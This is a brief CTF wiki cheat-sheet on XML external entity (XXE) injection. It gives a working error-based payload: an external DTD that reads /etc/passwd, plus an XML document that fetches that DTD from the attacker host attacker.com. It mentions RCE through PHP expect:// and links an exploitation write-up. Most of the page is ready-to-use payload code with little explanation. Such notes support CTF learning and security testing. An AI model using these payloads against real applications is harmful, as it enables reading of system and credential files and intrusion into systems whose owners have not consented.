.xml - adeptex/CTF GitHub Wiki
XXE injection allows to read arbitrary files and sometimes RCE (if expect://
is enabled in PHP). Place a dtd
file on your server and remote call it from XXE in vulnerable application.
https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
<?xml version="1.0" ?>
<!DOCTYPE message [
<!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd">
%ext;
]>
<message></message>